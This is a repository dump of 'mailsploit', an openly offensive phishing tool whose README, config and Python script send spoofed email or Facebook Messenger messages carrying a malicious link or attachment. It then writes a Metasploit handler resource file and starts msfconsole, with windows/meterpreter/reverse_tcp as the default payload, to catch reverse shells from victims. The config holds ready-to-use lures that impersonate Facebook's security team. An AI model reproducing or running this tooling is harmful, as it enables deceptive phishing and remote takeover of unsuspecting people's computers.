├── README.md ├── config ├── mailsploit.py └── setup.sh /README.md: -------------------------------------------------------------------------------- 1 | # mailsploit v1.1 2 | Sends someone a malicious payload through SMTP or FB Messenger and starts a listener with Metasploit. 3 | 4 | ### MailSploit Now Supports Email Spoofing To Any SMTP Server 5 | ### MailSploit Can Now Send Malicious Links To FB Messenger Accounts 6 | 7 | ### Requirements 8 | You need to have Metasploit installed in order for this to work. 9 | Kali Linux has it already installed. 10 | 11 | * https://www.metasploit.com/ 12 | * Create an account with - https://www.smtp2go.com 13 | 14 | 15 | ### How to Install 16 | 17 | > sh setup.sh 18 | 19 | ### How to use 20 | 21 | Set up your config file: replace everything that says None with the information that is necessary. 22 | 23 | Then run, 24 | 25 | > python mailsploit.py 26 | 27 | **You will be prompted to paste in a link. To do this, just upload it to a free file hosting server, copy the link and paste it.** 28 | **You can also use a phishing site created from the social engineering toolkit.** 29 | 30 | ### Some Useful Links 31 | * [https://nofile.io/](https://nofile.io/) 32 | * [https://github.com/trustedsec/social-engineer-toolkit](https://github.com/trustedsec/social-engineer-toolkit) 33 | 34 | You will be able to upload any files. 35 | 36 | happy hacking. 
;) 37 | 38 | ### Remember: 39 | ### This cannot be used for illegal activities, I'm not to blame if you get into trouble 40 | -------------------------------------------------------------------------------- /config: -------------------------------------------------------------------------------- 1 | [Config] 2 | 3 | ######################### 4 | # SMTP Credentials 5 | ######################### 6 | smtpEmail = None 7 | smtpPass = None 8 | 9 | 10 | ########################################### 11 | # 12 | # Setup an account at http://www.smtp2go.com/‎ 13 | # 14 | ########################################### 15 | smtpGoServer = mail.smtp2go.com:2525 16 | 17 | ############################################# 18 | ### Define your SMTP Credentials ## 19 | ## Servers such as, Gmail, Yahoo, Outlook ## 20 | ############################################# 21 | smtpServer = smtp.gmail.com:587 22 | 23 | ######################################## 24 | ### Define your Facebook credentials ### 25 | ######################################## 26 | fbusername = None 27 | fbpassword = None 28 | 29 | ###################### 30 | ### Facebook Stuff ### 31 | ###################### 32 | fbuser = None 33 | fbuserID = None 34 | fbmessage = Hi John, We have found that your account has been accessed by multiple accounts. 35 | Do you want us to do a security check, if yes, we need you to authorize your account so we can 36 | have a look. 37 | 38 | 39 | 40 | 41 | ################## 42 | ### Mail stuff ### 43 | ################## 44 | # Make sure this stays in this format. 45 | goodByeName = Yours sincerely,
Jack
46 | ####################################################################### 47 | 48 | ############################# 49 | # Either True / False 50 | ############################# 51 | enabledSpoofing = False 52 | 53 | 54 | ############################# 55 | # The Spoofed email address, 56 | # This might come up as spam. 57 | ############################# 58 | spoofEmail = facebook-non-reply@gmail.com 59 | 60 | 61 | ############################## 62 | # The target email address. 63 | ############################## 64 | targetEmail = None 65 | 66 | 67 | ################################################# 68 | # File Attachment 69 | # -------------- 70 | # Email Providers will block suspicious files 71 | ################################################# 72 | attachment = None 73 | 74 | 75 | 76 | 77 | ####################################################################### 78 | # The subject 79 | ####################################################################### 80 | subject = Facebook CyberSecurity Team: Authorization Email 81 | ####################################################################### 82 | 83 | 84 | ####################################################################### 85 | # Make sure this stays in this format. 86 | # 87 | # Must be greater than 10 characters 88 | ####################################################################### 89 | message = Hi Peter,

90 | We have found that your account has been accessed by multiple accounts. 91 | Do you want us to do a security check, if yes, we need you to authorize your account so we can 92 | have a look. 93 | 94 | ##################################### 95 | # Custom HTML Message 96 | ##################################### 97 | isCustomHTML = False 98 | customHTML = message.html 99 | 100 | 101 | -------------------------------------------------------------------------------- /mailsploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ############################################################# 3 | # 4 | # Title: mailsploit.py 5 | # Author: Th3J0k3r 6 | # 7 | # Purpose: to be able to send a malicious link via email 8 | # to gain access to someones machine. 9 | # 10 | ############################################################ 11 | import subprocess 12 | import socket 13 | import ConfigParser 14 | import mimetypes 15 | import mechanize 16 | import time 17 | import os 18 | from lazyme.string import color_print 19 | import string 20 | from fbchat import Client 21 | from fbchat.models import * 22 | from fbchat import log, Client 23 | 24 | 25 | # 26 | # Prints a banner. 27 | # 28 | def banner (): 29 | 30 | os.system("clear") 31 | color_print( 32 | """ 33 | 34 | 35 | '||\ /||` '||` .|'''| '||` || 36 | ||\\.//|| '' || || || '' || 37 | || || '''|. || || `|'''|, '||''|, || .|''|, || ''||'' 38 | || || .|''|| || || . || || || || || || || || 39 | .|| ||. `|..||. .||. .||. |...|' ||..|' .||. `|..|' .||. `|..' 40 | || 41 | .|| 42 | 43 | Mail Exploitation Framework 44 | v1.1 45 | """, color='red') 46 | 47 | 48 | # 49 | # Sets up the configuration file. 
50 | # 51 | def setup (): 52 | 53 | # Setup the config file 54 | global enabledSpoofing 55 | global targetEmail 56 | global spoofEmail 57 | global smtpEmail 58 | global smtpPass 59 | global smtpGoServer 60 | global smtpServer 61 | global subject 62 | global message 63 | global attachment 64 | global isCustomHTML 65 | global customHTML 66 | global goodByeName 67 | global fbusername 68 | global fbpassword 69 | global fbmessage 70 | global fbuser 71 | global fbuserID 72 | 73 | configParser = ConfigParser.RawConfigParser() 74 | configParser.read('config') 75 | targetEmail = configParser.get('Config', 'targetEmail') 76 | enabledSpoofing = configParser.get('Config', 'enabledSpoofing') 77 | spoofEmail = configParser.get('Config', 'spoofEmail') 78 | attachment = configParser.get('Config', 'attachment') 79 | smtpEmail = configParser.get('Config', 'smtpEmail') 80 | smtpPass = configParser.get('Config', 'smtpPass') 81 | smtpGoServer = configParser.get('Config', 'smtpGoServer') 82 | smtpServer = configParser.get('Config', 'smtpServer') 83 | goodByeName = configParser.get('Config', 'goodByeName') 84 | subject = configParser.get('Config', 'subject') 85 | message = configParser.get('Config', 'message') 86 | isCustomHTML = configParser.get('Config', 'isCustomHTML') 87 | customHTML = configParser.get('Config', 'customHTML') 88 | fbuser = configParser.get('Config', 'fbuser') 89 | fbusername = configParser.get('Config', 'fbusername') 90 | fbpassword = configParser.get('Config', 'fbpassword') 91 | fbmessage = configParser.get('Config', 'fbmessage') 92 | fbuserID = configParser.get('Config', 'fbuserID') 93 | 94 | # Check if the message is greater than 10 characters 95 | if len(message) >= 10: 96 | 97 | try: 98 | 99 | fb = raw_input("Did you want to send to facebook messenger: [Y/n] ") 100 | if fb == 'No' or fb == 'n' or fb == 'no': 101 | 102 | global isUsingMessenger 103 | 104 | if (enabledSpoofing == 'True'): 105 | 106 | color_print("Make sure to sign up to 
https://www.smtp2go.com\nand setup the config file with the required information.", color='yellow') 107 | smtpgo = raw_input("Have you setup a SMTPGO account and setup the config file properly: [Y/n] ") 108 | if (smtpgo == 'Y' or smtpgo == 'y' or smtpgo == 'Yes' or smtpgo == 'yes'): 109 | 110 | color_print("[+] Email spoofing enabled", color='green') 111 | 112 | # Validate the input. 113 | if (goodByeName == 'None' or targetEmail == 'None' or spoofEmail == 'None' or smtpEmail == 'None' or smtpPass == 'None' or smtpGoServer == 'None'): 114 | color_print('[!] Please setup your config file. make sure you create an account at https://www.smtp2go.com', color='red') 115 | return 116 | else: 117 | # Connects to the server. 118 | isUsingMessenger = False 119 | sendMail(smtpGoServer, targetEmail, spoofEmail, smtpEmail, smtpPass, subject, message, goodByeName) 120 | 121 | else: 122 | 123 | 124 | color_print("[+] Email spoofing false", color='red') 125 | 126 | # Validate the input. 127 | if (goodByeName == 'None' or targetEmail == 'None' or spoofEmail == 'None' or smtpEmail == 'None' or smtpPass == 'None' or smtpServer == 'None'): 128 | color_print('[!] Please setup your config file', color='red') 129 | return 130 | else: 131 | # Connects to the server. 132 | isUsingMessenger = False 133 | sendMail(smtpServer, targetEmail, smtpEmail, smtpEmail, smtpPass, subject, message, goodByeName) 134 | else: 135 | # Validate the input. 136 | if (fbusername == 'None' or fbpassword == 'None' or fbmessage == 'None' or fbuserID == 'None'): 137 | color_print('[!] Please setup your config file.', color='red') 138 | return 139 | else: 140 | isUsingMessenger = True 141 | sendToMessenger() 142 | 143 | except KeyboardInterrupt: 144 | color_print("\nThanks, Happy hacking", color='blue') 145 | return 146 | else: 147 | color_print("[!] 
Please type in a longer message", color='red') 148 | return 149 | 150 | def sendToMessenger(): 151 | 152 | client = Client(fbusername, fbpassword) 153 | color_print("[+] Logged in to " + fbusername, color='green') 154 | # `searchForUsers` searches for the user and gives us a list of the results, 155 | # and then we just take the first one, aka. the most likely one: 156 | color_print("[+] Searching for user " + fbuser, color='blue') 157 | global user 158 | try: 159 | user = client.searchForUsers(fbuser)[0] 160 | 161 | if user.name == fbuser: 162 | 163 | 164 | color_print("[+] Found user " + user.name, color='green') 165 | time.sleep(2) 166 | 167 | print('user ID: {}'.format(user.uid)) 168 | print("user's name: {}".format(user.name)) 169 | print("user's photo: {}".format(user.photo)) 170 | print("Is user client's friend: {}".format(user.is_friend)) 171 | 172 | send = raw_input("Do you want to send the malicious message: [Y/n] ") 173 | if (send == 'Y' or send == 'Yes' or send == 'yes' or send == 'y'): 174 | 175 | try: 176 | color_print("[+] Sending malicious message to facebook messenger", color='blue') 177 | # Will send a message to the thread 178 | global link 179 | link = getLink() 180 | client.send(Message(text=fbmessage + "\n" + link), thread_id=fbuserID, thread_type=ThreadType.USER) 181 | color_print("[+] Message Sent. ", color='blue') 182 | listenForConnections() 183 | except FBchatFacebookError: 184 | color_print("[!] There might be a problem try making sure the facebook ID is correct", color='red') 185 | 186 | else: 187 | color_print("[!] No User found", color='red') 188 | return 189 | except IndexError: 190 | color_print("\n[!] Something bad happended :(", color='red') 191 | return 192 | # 193 | # Connects to the smtp server. 194 | # 195 | def sendMail(server, toAddr, address, username, password, subject, message, goodBye): 196 | # attempt to connect to the stmp server. 
197 | try: 198 | 199 | try: 200 | 201 | # Get the link 202 | link = getLink() 203 | color_print("[+] Sending email to.. " + toAddr, color='blue') 204 | time.sleep(1) 205 | if (enabledSpoofing == 'True'): color_print("[+] Spoofing email.. " + address, color='blue') 206 | time.sleep(1) 207 | color_print("[*] Sending malicious link..", color='yellow') 208 | time.sleep(1) 209 | 210 | 211 | # Check if the user wants to load a custom html file 212 | if (isCustomHTML == 'True'): 213 | 214 | # Only open a custom HTML file if it exists. 215 | if (os.path.isfile(customHTML)): 216 | 217 | color_print("[+] Loading custom HTML Message", color='green') 218 | 219 | CustomHTML = open(customHTML, 'r') 220 | 221 | 222 | if (os.path.isfile(attachment)==False and attachment == 'None'): 223 | 224 | # Send the mail. 225 | os.system("sendemail -f " + address + " -t " + toAddr + " -u " + subject + " -o message-content-type=html -o message-file=" + customHTML + " -xu " + username + " -xp " + password + " -s " + server + " -o tls=yes") 226 | listenForConnections() 227 | CustomHTML.close() 228 | else: 229 | color_print("[+] Sending attachment", color='green') 230 | # Send the mail 231 | os.system("sendemail -f " + address + " -t " + toAddr + " -u " + subject + " -a " + attachment + " -o message-content-type=html -o message-file=" + customHTML + " -xu " + username + " -xp " + password + " -s " + server + " -o tls=yes") 232 | listenForConnections() 233 | CustomHTML.close() 234 | else: 235 | color_print("[!] Custom HTML Does not exists!!", color='red') 236 | return 237 | else: 238 | 239 | 240 | # Print out a thew important messages. 241 | 242 | 243 | MessageFile = open('message.html', 'w') 244 | MessageFile.write(""" 245 | """+message+""" 246 |

247 | """+link+""" 248 |
"""+goodBye+"""
249 | """) 250 | MessageFile.close() 251 | 252 | if (os.path.isfile(attachment)==False and attachment == 'None'): 253 | 254 | # Send the mail. 255 | os.system("sendemail -f " + address + " -t " + toAddr + " -u " + subject + " -o message-content-type=html -o message-file=" + customHTML + " -xu " + username + " -xp " + password + " -s " + server + " -o tls=yes") 256 | listenForConnections() 257 | else: 258 | color_print("[+] Sending attachment", color='green') 259 | # Send the mail 260 | os.system("sendemail -f " + address + " -t " + toAddr + " -u " + subject + " -a " + attachment + " -o message-content-type=html -o message-file=" + customHTML + " -xu " + username + " -xp " + password + " -s " + server + " -o tls=yes") 261 | listenForConnections() 262 | 263 | 264 | except KeyboardInterrupt: 265 | color_print("\nThanks, Happy hacking", color='blue') 266 | return 267 | 268 | except socket.gaierror: 269 | # Failed to connect!!. 270 | color_print("\n[!] Could not connect to the server.", color='red') 271 | return 272 | 273 | 274 | def getLink (): 275 | # Tell the user to upload there file. 276 | color_print("Upload it to a free file hosting website: https://nofile.io/", color='yellow') 277 | color_print("OR Paste in the IP Address of your malicious server", color='yellow') 278 | time.sleep(2) 279 | link = raw_input("\nPaste your malicious link: \n") 280 | while len(link) == 0: link = raw_input("Paste your malicious link: ") 281 | return link 282 | 283 | # 284 | # Listen for a connection 285 | # 286 | def listenForConnections (): 287 | # Do you want to listen for any connections. 
288 | 289 | try: 290 | 291 | listen = raw_input('Do you want to start up a listener: [Y/N]: ') 292 | if listen == 'Y' or listen == 'y' or listen == 'yes' or listen == 'Yes': 293 | color_print("[+] Starting a listener", color='blue') 294 | 295 | # Listen for a connection 296 | 297 | lhost = raw_input('What is your LHOST (local ip address): ') 298 | lport = raw_input('What is your LPORT (port): ') 299 | payload = raw_input('What is your payload: (eg windows/meterpreter/reverse_tcp): ') 300 | if payload == '': 301 | payload = 'windows/meterpreter/reverse_tcp' 302 | 303 | if os.path.isfile('resource.rc'): 304 | os.system('rm resource.rc') 305 | os.system('touch resource.rc') 306 | os.system('echo use exploit/multi/handler >> resource.rc') 307 | os.system('echo set PAYLOAD ' + payload + ' >> resource.rc') 308 | os.system('echo set LHOST ' + lhost + ' >> resource.rc') 309 | os.system('echo set LPORT ' + lport + ' >> resource.rc') 310 | os.system('echo set ExitOnSession false >> resource.rc') 311 | os.system('echo exploit -j -z >> resource.rc') 312 | os.system('cat resource.rc') 313 | os.system('msfconsole -r resource.rc') 314 | else: 315 | ####################################################### 316 | # This call is still in development 317 | ####################################################### 318 | #color_print("[+] Generated a report..", color='green') 319 | #if isUsingMessenger == False: 320 | # generateMailReport(fromAddr, toAddr, spoofName, subject, message, html) 321 | #else: 322 | # generateMessengerReport(fbuser, fbuserID, fbmessage, link) 323 | #color_print("\nThanks, Happy hacking", color='blue') 324 | return 325 | except KeyboardInterrupt: 326 | color_print("\nThanks, Happy hacking", color='blue') 327 | return 328 | 329 | 330 | ####################################################### 331 | # This function is still in development 332 | ####################################################### 333 | def generateMessengerReport(fbuser, fbuserID, message, link): 
334 | f = open("reports/" + fbuser + ".html", "w") 335 | f.write(""" 336 | 337 | 338 |
339 | 340 |
341 | 342 | MailSpoof Report 343 | 344 | 345 | 346 | 347 | 348 | 349 | 350 | 351 | 352 | 353 | 354 | 355 | 356 |
UserIDMessageLink
""" + str(fbuser) +"""""" + str(fbuserID) +"""""" + str(message) +""""""+link+"""
357 | """) 358 | f.close() 359 | 360 | ####################################################### 361 | # This function is still in development 362 | ####################################################### 363 | def generateMailReport(fromemail, toemail, spoofemail, subject, message, link): 364 | f = open("reports/" + toemail + ".html", "w") 365 | f.write(""" 366 | 367 | 368 | 369 | MailSpoof Report 370 | 371 | 372 | 373 | 374 | 375 | 376 | 377 | 378 | 379 | 380 | 381 | 382 | 383 | 384 | 385 | 386 | 387 |
From EmailTo EmailSpoofed EmailSubjectMessageLink
""" + str(fromemail) +"""""" + str(toemail) +"""""" + str(spoofemail) +"""""" + str(subject) +"""""" + str(message) +"""""" + str(link) + """
388 | """) 389 | f.close() 390 | 391 | 392 | #### Call the methods #### 393 | banner() 394 | setup() 395 | -------------------------------------------------------------------------------- /setup.sh: -------------------------------------------------------------------------------- 1 | echo "================================================" 2 | echo "[============== MAIL SPLOIT INSTALLER ==========]" 3 | echo "================================================" 4 | 5 | echo "\n[+] Installing mailsploit\n" 6 | 7 | pip install color_print 8 | pip install lazyme 9 | pip install ConfigParser 10 | pip install yagmail 11 | pip install fbchat 12 | 13 | echo "\n[+] Creating some directorys." 14 | mkdir reports 15 | 16 | echo "\n done" 17 | --------------------------------------------------------------------------------